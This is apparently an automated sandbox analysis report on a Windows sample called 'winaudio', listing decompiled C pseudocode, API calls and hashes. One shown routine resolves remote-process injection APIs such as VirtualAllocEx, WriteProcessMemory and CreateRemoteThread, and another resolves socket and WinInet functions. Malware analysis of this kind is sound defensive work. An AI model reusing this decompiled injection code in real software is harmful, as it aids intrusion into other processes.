                        0x0037a701
                        0x0037a701
                        0x0037a70d
                        0x0037a718
                        0x0037a718
                        0x0037a6ff
                        0x0037a6ca
                        0x0037a5e9
                        0x0037a518
                        0x0037a504
                        0x0037a4c9
                        0x0037a4cb
                        0x0037a4cb

                        APIs
                        • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00379374,847B54EE,?,00000001,00000000), ref: 0037A4E7
                        • LoadLibraryW.KERNEL32(WS2_32.dll,?,00000001,00000000), ref: 0037A4FB
                        • LoadLibraryW.KERNEL32(Wininet.dll,?,00000001,00000000), ref: 0037A50F
                        • GetProcAddress.KERNEL32(send), ref: 0037A539
                        • GetProcAddress.KERNEL32(recv), ref: 0037A54B
                        • GetProcAddress.KERNEL32(closesocket), ref: 0037A55D
                        • GetProcAddress.KERNEL32(socket), ref: 0037A56F
                        • GetProcAddress.KERNEL32(gethostbyname), ref: 0037A581
                        • GetProcAddress.KERNEL32(htons), ref: 0037A593
                        • GetProcAddress.KERNEL32(WSAStartup), ref: 0037A5A5
                        • GetProcAddress.KERNEL32(setsockopt), ref: 0037A5B7
                        • GetProcAddress.KERNEL32(inet_addr), ref: 0037A5C9
                        • GetProcAddress.KERNEL32(connect), ref: 0037A5DB
                        • GetProcAddress.KERNEL32(InternetOpenA), ref: 0037A674
                        • GetProcAddress.KERNEL32(InternetOpenUrlA), ref: 0037A686
                        • GetProcAddress.KERNEL32(InternetReadFile), ref: 0037A698
                        • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 0037A6AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: GetNativeSystemInfo$HttpQueryInfoA$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$Kernel32.dll$WS2_32.dll$WSAStartup$Wininet.dll$closesocket$connect$gethostbyname$htons$inet_addr$recv$send$setsockopt$socket
                        • API String ID: 2238633743-211157345
                        • Opcode ID: 67e52f17c4c641a5f7597e9ec02f9d5f9a74a5838ff89b0aebd4297711438894
                        • Instruction ID: 2ee906db2cf31197fdf4fb022d97e4f249a57ed19a66b45159857ddd3d7109a5
                        • Opcode Fuzzy Hash: 67e52f17c4c641a5f7597e9ec02f9d5f9a74a5838ff89b0aebd4297711438894
                        • Instruction Fuzzy Hash: BC5107748007E1DADB37DB62EC88B893EB9B784359F004B2AE4095E2F4C7B94856DF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D5A90 Relevance: 43.8, APIs: 13, Strings: 12, Instructions: 87libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E002D5A90() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;

				if( *0x3f084c != 0) {
					L14:
					return 1;
				} else {
					_t2 = LoadLibraryA("Kernel32.dll");
					 *0x3f084c = _t2;
					if(_t2 == 0) {
						L13:
						E002D5A00();
						GetLastError();
						return 0;
					} else {
						_t6 = GetProcAddress(_t2, "OpenProcess");
						 *0x3f0838 = _t6;
						if(_t6 == 0) {
							goto L13;
						} else {
							_t7 = GetProcAddress( *0x3f084c, "VirtualAllocEx");
							 *0x3f0844 = _t7;
							if(_t7 == 0) {
								goto L13;
							} else {
								_t8 = GetProcAddress( *0x3f084c, "WriteProcessMemory");
								 *0x3f0858 = _t8;
								if(_t8 == 0) {
									goto L13;
								} else {
									_t9 = GetProcAddress( *0x3f084c, "CreateRemoteThread");
									 *0x3f0840 = _t9;
									if(_t9 == 0) {
										goto L13;
									} else {
										_t10 = GetProcAddress( *0x3f084c, "WaitForSingleObject");
										 *0x3f0864 = _t10;
										if(_t10 == 0) {
											goto L13;
										} else {
											_t11 = GetProcAddress( *0x3f084c, "VirtualFreeEx");
											 *0x3f0850 = _t11;
											if(_t11 == 0) {
												goto L13;
											} else {
												_t12 = GetProcAddress( *0x3f084c, "LoadLibraryA");
												 *0x3f085c = _t12;
												if(_t12 == 0) {
													goto L13;
												} else {
													_t13 = GetProcAddress( *0x3f084c, "IsWow64Process");
													 *0x3f0848 = _t13;
													if(_t13 == 0) {
														goto L13;
													} else {
														_t14 = GetProcAddress( *0x3f084c, "CreateToolhelp32Snapshot");
														 *0x3f0854 = _t14;
														if(_t14 == 0) {
															goto L13;
														} else {
															_t15 = GetProcAddress( *0x3f084c, "Process32First");
															 *0x3f0860 = _t15;
															if(_t15 == 0) {
																goto L13;
															} else {
																_t16 = GetProcAddress( *0x3f084c, "Process32Next");
																 *0x3f083c = _t16;
																if(_t16 != 0) {
																	goto L14;
																} else {
																	goto L13;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}















                        0x002d5a9b
                        0x002d5bd1
                        0x002d5bd4
                        0x002d5aa1
                        0x002d5aa6
                        0x002d5aac
                        0x002d5ab3
                        0x002d5bc0
                        0x002d5bc0
                        0x002d5bc5
                        0x002d5bcf
                        0x002d5ab9
                        0x002d5ac5
                        0x002d5ac7
                        0x002d5ace
                        0x00000000
                        0x002d5ad4
                        0x002d5adf
                        0x002d5ae1
                        0x002d5ae8
                        0x00000000
                        0x002d5aee
                        0x002d5af9
                        0x002d5afb
                        0x002d5b02
                        0x00000000
                        0x002d5b08
                        0x002d5b13
                        0x002d5b15
                        0x002d5b1c
                        0x00000000
                        0x002d5b22
                        0x002d5b2d
                        0x002d5b2f
                        0x002d5b36
                        0x00000000
                        0x002d5b3c
                        0x002d5b47
                        0x002d5b49
                        0x002d5b50
                        0x00000000
                        0x002d5b52
                        0x002d5b5d
                        0x002d5b5f
                        0x002d5b66
                        0x00000000
                        0x002d5b68
                        0x002d5b73
                        0x002d5b75
                        0x002d5b7c
                        0x00000000
                        0x002d5b7e
                        0x002d5b89
                        0x002d5b8b
                        0x002d5b92
                        0x00000000
                        0x002d5b94
                        0x002d5b9f
                        0x002d5ba1
                        0x002d5ba8
                        0x00000000
                        0x002d5baa
                        0x002d5bb5
                        0x002d5bb7
                        0x002d5bbe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002d5bbe
                        0x002d5ba8
                        0x002d5b92
                        0x002d5b7c
                        0x002d5b66
                        0x002d5b50
                        0x002d5b36
                        0x002d5b1c
                        0x002d5b02
                        0x002d5ae8
                        0x002d5ace
                        0x002d5ab3

                        APIs
                        • LoadLibraryA.KERNEL32(Kernel32.dll,00000000,?,002DB562,?,?,?,?,?,?,?,?,847B54EE), ref: 002D5AA6
                        • GetProcAddress.KERNEL32(00000000,OpenProcess), ref: 002D5AC5
                        • GetProcAddress.KERNEL32(VirtualAllocEx), ref: 002D5ADF
                        • GetProcAddress.KERNEL32(WriteProcessMemory), ref: 002D5AF9
                        • GetProcAddress.KERNEL32(CreateRemoteThread), ref: 002D5B13
                        • GetProcAddress.KERNEL32(WaitForSingleObject), ref: 002D5B2D
                        • GetProcAddress.KERNEL32(VirtualFreeEx), ref: 002D5B47
                        • GetProcAddress.KERNEL32(LoadLibraryA), ref: 002D5B5D
                        • GetProcAddress.KERNEL32(IsWow64Process), ref: 002D5B73
                        • GetProcAddress.KERNEL32(CreateToolhelp32Snapshot), ref: 002D5B89
                        • GetProcAddress.KERNEL32(Process32First), ref: 002D5B9F
                        • GetProcAddress.KERNEL32(Process32Next), ref: 002D5BB5
                        • GetLastError.KERNEL32(?,002DB562,?,?,?,?,?,?,?,?,847B54EE), ref: 002D5BC5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$ErrorLastLibraryLoad
                        • String ID: CreateRemoteThread$CreateToolhelp32Snapshot$IsWow64Process$Kernel32.dll$LoadLibraryA$OpenProcess$Process32First$Process32Next$VirtualAllocEx$VirtualFreeEx$WaitForSingleObject$WriteProcessMemory
                        • API String ID: 856020675-3726292625
                        • Opcode ID: 893fa63a400e22846420aeb87e8e22752ced3d45db4d0528e0bb80a16fb1bcbb
                        • Instruction ID: 1d6faf2077554d747410dc70a62da1c6ff688a60de0970c2eedc1f200971fe5e
                        • Opcode Fuzzy Hash: 893fa63a400e22846420aeb87e8e22752ced3d45db4d0528e0bb80a16fb1bcbb
                        • Instruction Fuzzy Hash: 15216F3456177B9ACB575F3EEC11E7A3AECAB00385B940223E004D12B6EBB1D810CF98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00393A82 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 41%
                        			E00393A82(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = E003937E5(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00390BC9(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = E00393750();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00390B12(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x3f0290 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = E00393503(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0x3f0290 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t266 = _v44;
										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
										if((_t266 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t266 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
											_t245 = E00393750();
											__eflags = _t245 - 0xffffffff;
											if(_t245 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0x3f0290 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
												goto L31;
											}
											E00380E68(GetLastError());
											 *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00390CDB( *_t190);
											L10:
											goto L2;
										}
									}
									_t269 = _t134;
									goto L22;
								} else {
									_t269 = E00393961(_t205,  *_t190);
									__eflags = _t269;
									if(__eflags != 0) {
										L22:
										E0038CD25(__eflags,  *_t190);
										return _t269;
									}
									goto L20;
								}
							}
							_t270 = GetLastError();
							E00380E68(_t270);
							 *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x3f0290 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t252);
							__eflags = _t270;
							if(_t270 == 0) {
								 *((intOrPtr*)(E00380E9E())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0x3f0290 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00380E68(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t284 = _t277 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t284,  &_v48, _t239 << 2);
						_t197 = 0;
						_t252 = E00393750();
						_t277 = _t284 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00380E8B()) =  *_t186 & 0x00000000;
						 *_t190 = _t263;
						 *((intOrPtr*)(E00380E9E())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00380E8B()) =  *_t188 & 0x00000000;
					 *_a8 = _t263;
					L2:
					return  *((intOrPtr*)(E00380E9E()));
				}
			}





















































                        0x00393aa5
                        0x00393aa9
                        0x00393aaa
                        0x00393aaa
                        0x00393aaa
                        0x00393aac
                        0x00393ab2
                        0x00393acd
                        0x00393ad2
                        0x00393ad5
                        0x00393ad7
                        0x00393ad9
                        0x00393af8
                        0x00393aff
                        0x00393b06
                        0x00393b09
                        0x00393b15
                        0x00393b18
                        0x00393b20
                        0x00393b21
                        0x00393b24
                        0x00393b24
                        0x00393b2b
                        0x00393b2d
                        0x00393b30
                        0x00393b38
                        0x00393b3b
                        0x00393ba8
                        0x00393ba9
                        0x00393baf
                        0x00393bb1
                        0x00393bfa
                        0x00393bfd
                        0x00393c06
                        0x00393c09
                        0x00393c0c
                        0x00393c0e
                        0x00393c0e
                        0x00393c0e
                        0x00393bff
                        0x00393c02
                        0x00393c02
                        0x00393c13
                        0x00393c16
                        0x00393c22
                        0x00393c27
                        0x00393c33
                        0x00393c3d
                        0x00393c41
                        0x00393c4b
                        0x00393c4e
                        0x00393c59
                        0x00393c5e
                        0x00393c6e
                        0x00393c71
                        0x00393c75
                        0x00393c76
                        0x00393c7c
                        0x00393c81
                        0x00393c84
                        0x00393c86
                        0x00393c88
                        0x00393c8d
                        0x00393c90
                        0x00393c92
                        0x00393cbc
                        0x00393ce0
                        0x00393ce4
                        0x00393ce8
                        0x00393cea
                        0x00393cee
                        0x00393cf0
                        0x00393cfa
                        0x00393cfd
                        0x00393d04
                        0x00393d04
                        0x00393d04
                        0x00393d04
                        0x00393cee
                        0x00393d09
                        0x00393d15
                        0x00393d17
                        0x00393da2
                        0x00393da2
                        0x00000000
                        0x00393d1d
                        0x00393d1d
                        0x00393d21
                        0x00000000
                        0x00000000
                        0x00393d26
                        0x00393d38
                        0x00393d40
                        0x00393d43
                        0x00393d44
                        0x00393d47
                        0x00393d4e
                        0x00393d53
                        0x00393d56
                        0x00393d8a
                        0x00393d94
                        0x00393d94
                        0x00393d9e
                        0x00000000
                        0x00393d9e
                        0x00393d5f
                        0x00393d78
                        0x00393d7f
                        0x00393ba2
                        0x00000000
                        0x00393ba2
                        0x00393d17
                        0x00393c94
                        0x00000000
                        0x00393c60
                        0x00393c67
                        0x00393c6a
                        0x00393c6c
                        0x00393c96
                        0x00393c98
                        0x00000000
                        0x00393c9e
                        0x00000000
                        0x00393c6c
                        0x00393c5e
                        0x00393bb9
                        0x00393bbc
                        0x00393bd7
                        0x00393bdc
                        0x00393be2
                        0x00393be4
                        0x00393bef
                        0x00393bef
                        0x00000000
                        0x00393be4
                        0x00393b3d
                        0x00393b44
                        0x00393b46
                        0x00393b7d
                        0x00393b7d
                        0x00393b87
                        0x00393b8a
                        0x00393b91
                        0x00393b91
                        0x00393b91
                        0x00393b9d
                        0x00000000
                        0x00393b9d
                        0x00393b48
                        0x00393b4c
                        0x00000000
                        0x00000000
                        0x00393b4e
                        0x00393b5d
                        0x00393b62
                        0x00393b65
                        0x00393b66
                        0x00393b69
                        0x00393b69
                        0x00393b70
                        0x00393b72
                        0x00393b75
                        0x00393b78
                        0x00393b7b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00393adb
                        0x00393ae0
                        0x00393ae3
                        0x00393aea
                        0x00000000
                        0x00393aea
                        0x00393ab4
                        0x00393ab9
                        0x00393abf
                        0x00393ac1
                        0x00000000
                        0x00393ac6

                        APIs
                          • Part of subcall function 00393750: CreateFileW.KERNEL32(00000000,?,?,+;9,?,?,00000000,?,00393B2B,00000000,0000000C), ref: 0039376D
                        • GetLastError.KERNEL32 ref: 00393B96
                        • __dosmaperr.LIBCMT ref: 00393B9D
                        • GetFileType.KERNEL32(00000000), ref: 00393BA9
                        • GetLastError.KERNEL32 ref: 00393BB3
                        • __dosmaperr.LIBCMT ref: 00393BBC
                        • CloseHandle.KERNEL32(00000000), ref: 00393BDC
                        • CloseHandle.KERNEL32(?), ref: 00393D26
                        • GetLastError.KERNEL32 ref: 00393D58
                        • __dosmaperr.LIBCMT ref: 00393D5F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 1e43ebe517b4730949542507888cd8889a510e942886d063fac91972f6541e28
                        • Instruction ID: 23ee417faa5df748ca8ff36cd2bff9b8bc373122ecddf13a9021f0780276c243
                        • Opcode Fuzzy Hash: 1e43ebe517b4730949542507888cd8889a510e942886d063fac91972f6541e28
                        • Instruction Fuzzy Hash: 96A13372A105089FDF1AEF6CDC927AE7BA4AF06320F140149E851EF391D7319E12CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00396DA3 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlDecodePointer.NTDLL(?), ref: 00396DC6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt$"-
                        • API String ID: 3527080286-2971634178
                        • Opcode ID: 1fcfef08b462bf80331c9bb31aa6825e7c8da9d281e49b31554a049d60e5906d
                        • Instruction ID: f8b15b426a3590839856258d3864d853defc2ad8ceff148f1580dafe2acbb282
                        • Opcode Fuzzy Hash: 1fcfef08b462bf80331c9bb31aa6825e7c8da9d281e49b31554a049d60e5906d
                        • Instruction Fuzzy Hash: 3251A1B590160ACBCF16DF58FA495EDBBB8FF49304F220196E482A7664CB718D24DB14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002ED120 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 64%
                        			E002ED120(void* __edi) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __esi;
				signed int _t20;
				CHAR* _t22;
				void* _t28;
				unsigned int _t31;
				struct HINSTANCE__* _t39;
				void* _t43;
				void* _t48;
				void* _t51;
				void* _t56;
				long _t57;
				long _t59;
				void* _t60;
				void* _t61;
				signed int _t62;
				void* _t63;

				E00397C10();
				_t20 =  *0x3e1008; // 0x847b54ee
				_v8 = _t20 ^ _t62;
				_t22 =  *0x3ed73c; // 0xffffffff
				if(_t22 != 0) {
					L12:
					if(_t22 == 0xffffffff) {
						goto L6;
					} else {
						 *_t22();
						_pop(_t61);
						return E002E056D(_v8 ^ _t62, _t48, _t61);
					}
				} else {
					_t39 = GetModuleHandleA(_t22);
					if(_t39 == 0) {
						_t22 =  *0x3ed73c; // 0xffffffff
					} else {
						_t22 = GetProcAddress(_t39, "_OPENSSL_isservice");
						 *0x3ed73c = _t22;
					}
					if(_t22 != 0) {
						goto L12;
					} else {
						 *0x3ed73c = 0xffffffff;
						L6:
						_t51 = GetProcessWindowStation();
						if(_t51 == 0 || GetUserObjectInformationW(_t51, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							_pop(_t56);
							return E002E056D(_v8 ^ _t62, _t48, _t56);
						} else {
							_t57 = _v12;
							if(_t57 > 0x200) {
								goto L14;
							} else {
								_t59 = _t57 + 0x00000001 & 0xfffffffe;
								E00397C40(_t59);
								_t28 = _t63;
								_v16 = _t28;
								if(GetUserObjectInformationW(_t51, 2, _t28, _t59,  &_v12) == 0) {
									goto L14;
								} else {
									_t43 = _v16;
									_t31 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t31;
									_push(L"Service-0x");
									 *((short*)(_t43 + (_t31 >> 1) * 2)) = 0;
									E0037E9EB(_t43);
									asm("sbb eax, eax");
									_t60 = _t43;
									return E002E056D(_v8 ^ _t62, 0, _t60);
								}
							}
						}
					}
				}
			}























                        0x002ed128
                        0x002ed12d
                        0x002ed134
                        0x002ed137
                        0x002ed140
                        0x002ed225
                        0x002ed228
                        0x00000000
                        0x002ed22e
                        0x002ed22e
                        0x002ed234
                        0x002ed242
                        0x002ed242
                        0x002ed146
                        0x002ed147
                        0x002ed14f
                        0x002ed164
                        0x002ed151
                        0x002ed157
                        0x002ed15d
                        0x002ed15d
                        0x002ed16b
                        0x00000000
                        0x002ed171
                        0x002ed171
                        0x002ed17b
                        0x002ed181
                        0x002ed185
                        0x002ed243
                        0x002ed24a
                        0x002ed258
                        0x002ed1b3
                        0x002ed1b3
                        0x002ed1bc
                        0x00000000
                        0x002ed1c2
                        0x002ed1c3
                        0x002ed1cc
                        0x002ed1d1
                        0x002ed1dc
                        0x002ed1e7
                        0x00000000
                        0x002ed1e9
                        0x002ed1ee
                        0x002ed1f2
                        0x002ed1f5
                        0x002ed1fa
                        0x002ed200
                        0x002ed204
                        0x002ed20e
                        0x002ed216
                        0x002ed224
                        0x002ed224
                        0x002ed1e7
                        0x002ed1bc
                        0x002ed185
                        0x002ed16b

                        APIs
                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000000,?,002ED33D), ref: 002ED147
                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 002ED157
                        • GetProcessWindowStation.USER32(?,00000000,?,002ED33D), ref: 002ED17B
                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,002ED33D), ref: 002ED196
                        • GetLastError.KERNEL32(?,002ED33D), ref: 002ED1A4
                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,002ED33D), ref: 002ED1DF
                        • _wcsstr.LIBVCRUNTIME ref: 002ED204
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
